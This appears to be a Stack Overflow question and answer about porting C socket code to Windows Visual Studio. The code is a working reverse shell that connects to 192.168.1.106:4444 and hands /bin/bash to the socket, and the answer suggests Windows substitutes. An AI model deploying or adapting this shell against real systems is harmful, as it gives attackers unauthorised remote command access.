# Implement <netinet/in.h> in Windows Visual Studio

Tags: c++, windows, visual-studio, sockets, websocket

I'm currently working on a c++ project regarding a TCP Remote shell. Therefore I build the following code. As I'm working on windows, I found substitute libraries and headers for all of the following "#include", except for `<netinet/in.h>`

Thanks for all your help!

```
#include <stdio.h>

#include <sys/types.h>
#include <stdlib.h>
#include <C:\Visual Studio 2019\libunistd-master\unistd\sys\socket.h>
#include <C:\Visual Studio 2019\libunistd-master\unistd\unistd.h>
#include <Winsock2.h>
//#include <netinet/in.h>
#include <C:\Documents\Visual Studio 2019\libunistd-master\unistd\arpa/inet.h>

int main(void) {

    int sockt;
    int port = 4444;
    struct sockaddr_in revsockaddr;

    sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.106");

    connect(sockt, (struct sockaddr*)&revsockaddr,
        sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char* const argv[] = {"/bin/bash", NULL };
    execve("/bin/bash", argv, NULL);

    return 0;

}
```

´´´´´´

Comment: Possible duplicate of: https://stackoverflow.com/questions/4432989/c-header-files-for-udp-in-windows

Comment: *"Thanks for all your help!"* is not a question. Read [ask].

Comment: Does this answer your question? [C++ header files for UDP in Windows?](https://stackoverflow.com/questions/4432989/c-header-files-for-udp-in-windows)

Answer (score 4):

Do not try to find a match for your include files from Linux to Windows. Instead, try to compile your code step by step and add those include files that you need. What I can see in the code:

1. Instead of `inet_addr` you can use `inet_pton` that is inside the `<Ws2tcpip.h>` include file.
2. Instead of `dub2` use `_dub2` in windows, that is inside `<io.h>`.
3. instead of `execve`, use `std::system`.